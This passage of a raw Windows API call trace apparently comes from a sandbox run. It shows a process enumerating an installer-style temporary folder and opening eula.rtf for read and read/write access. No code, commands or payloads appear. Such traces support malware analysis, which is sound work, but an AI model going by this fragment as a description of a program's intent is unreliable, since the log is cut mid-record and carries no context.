Flags=0x0, Size=0x30) returned 0x4dea8 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.391] AreFileApisANSI () returned 1 [0061.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 46 [0061.391] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1046\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.391] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46280, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0061.391] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0061.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.392] AreFileApisANSI () returned 1 [0061.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049", lpUsedDefaultChar=0x0) returned 27 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0061.484] AreFileApisANSI () returned 1 [0061.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049") returned 27 [0061.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049" (normalized: "c:\\588bce7c90097ed212\\1049"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.484] GetLastError () returned 0x5 [0061.484] GetLastError () returned 0x5 [0061.484] SetLastError (dwErrCode=0x5) [0061.484] GetLastError () returned 0x5 [0061.484] SetLastError (dwErrCode=0x5) [0061.484] GetLastError () returned 0x5 [0061.484] SetLastError (dwErrCode=0x5) [0061.484] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.484] AreFileApisANSI () returned 1 [0061.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.484] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049") returned 27 [0061.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049" (normalized: "c:\\588bce7c90097ed212\\1049"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.485] GetLastError () returned 0x5 [0061.485] GetLastError () returned 0x5 [0061.485] SetLastError (dwErrCode=0x5) [0061.485] GetLastError () returned 0x5 [0061.485] SetLastError (dwErrCode=0x5) [0061.485] GetLastError () returned 0x5 [0061.485] SetLastError (dwErrCode=0x5) [0061.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.485] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0061.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.485] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.485] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1053", cAlternateFileName="")) returned 1 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.485] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.485] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.485] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.486] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.486] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.486] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71bd0 [0061.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0061.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0061.487] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.487] AreFileApisANSI () returned 1 [0061.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1049\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.487] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.487] AreFileApisANSI () returned 1 [0061.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.487] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0061.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0061.487] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.488] GetFileType (hFile=0x41c) returned 0x1 [0061.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.488] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.488] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.488] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.489] CloseHandle (hObject=0x41c) returned 1 [0061.489] AreFileApisANSI () returned 1 [0061.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0061.489] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.489] GetFileType (hFile=0x41c) returned 0x1 [0061.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.489] CloseHandle (hObject=0x41c) returned 1 [0061.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.490] AreFileApisANSI () returned 1 [0061.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0061.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 36 [0061.490] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8)) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.490] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.490] InitOnceExecuteOnce (in: 